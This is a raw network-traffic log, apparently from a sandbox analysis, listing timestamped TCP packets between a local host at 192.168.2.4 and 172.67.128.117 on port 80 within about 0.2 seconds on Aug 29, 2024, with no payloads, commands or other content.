                                  Aug 29, 2024 23:42:09.529530048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529551983 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529640913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529652119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529665947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529678106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529687881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529687881 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529699087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529711962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529716969 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529725075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529726982 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529755116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529773951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529784918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529798031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529834986 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529933929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529946089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529956102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529968023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529980898 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529980898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529994965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530000925 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530006886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530019045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530023098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530035019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530046940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530051947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530060053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530086994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530217886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530229092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530239105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530249119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530261040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530266047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530272961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530283928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530284882 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530297995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530306101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530328035 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530349970 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530359030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530369997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530380011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530391932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530404091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530407906 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530414104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.530430079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530436993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.530466080 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.531934977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.531953096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.531964064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.531982899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.531994104 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532011986 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532032967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532043934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532063007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532073021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532078028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532085896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532087088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532105923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532128096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532401085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532413006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532423973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532450914 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532471895 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532485962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532497883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532509089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532526970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532536030 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532540083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532551050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532558918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532562017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532582045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532607079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532619953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532638073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532649994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532660961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532664061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532674074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532685041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532690048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532712936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532713890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532723904 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532727003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532753944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532757044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532768965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532774925 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532780886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532809019 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532829046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532866001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532876968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532886982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532896996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532910109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532915115 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532922983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532944918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532957077 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532973051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532975912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.532985926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.532996893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533008099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533024073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533041000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533051014 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533052921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533071041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533082962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533090115 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533114910 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533133030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533138990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533144951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533157110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533165932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.533176899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.533205032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.613488913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613497972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613503933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613590956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613606930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613615036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613631010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613641977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613765955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613818884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.613842010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613852978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613863945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.613883972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613895893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613907099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613918066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.613934040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614005089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614276886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614316940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614347935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614358902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614373922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614399910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614403963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614412069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614422083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614447117 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614454031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614464045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614474058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614489079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614496946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.614500999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.614540100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617707968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617774010 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617834091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617845058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617856026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617868900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617883921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617885113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617914915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617934942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617947102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617959023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617969036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617984056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.617995977 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.617996931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618019104 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618046045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618163109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618175030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618202925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618212938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618212938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618225098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618237019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618248940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618248940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618258953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618263006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618274927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618285894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618293047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618297100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618319035 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618338108 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618628025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618642092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618652105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618664980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618676901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618679047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618691921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618701935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618705034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618716955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618722916 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618726969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618738890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618750095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618752956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618761063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618782997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618793011 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618797064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618808985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618819952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618830919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618833065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618839979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618844032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618856907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618874073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618899107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618920088 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618931055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618940115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618951082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618963957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618964911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618978024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.618983030 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.618989944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.619003057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.619009018 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619014978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.619029999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.619035006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619035006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619043112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619062901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619075060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.619082928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.619128942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620548010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620558977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620575905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620589018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620599031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620601892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620613098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620625019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620630026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620639086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620647907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620671034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620693922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620841980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620870113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620879889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620889902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620891094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620914936 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620943069 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.620974064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.620991945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621002913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621015072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621018887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621026039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621036053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621041059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621064901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621099949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621112108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621120930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621134043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621145010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621146917 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621156931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621161938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621170044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621185064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621186972 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621200085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621211052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621211052 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621222973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621228933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621251106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621260881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621273041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621292114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621303082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621309042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621331930 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621349096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621381998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621392965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621411085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621422052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621427059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621433973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621445894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621452093 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621473074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621479034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621490002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621495962 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621500015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621510029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621522903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621546984 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621572971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621584892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621593952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621608019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621619940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621645927 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621668100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621680021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621690035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621701002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.621715069 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621736050 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.621750116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.702131033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702172041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.702181101 CEST8049730172.67.128.117192.168.2.4
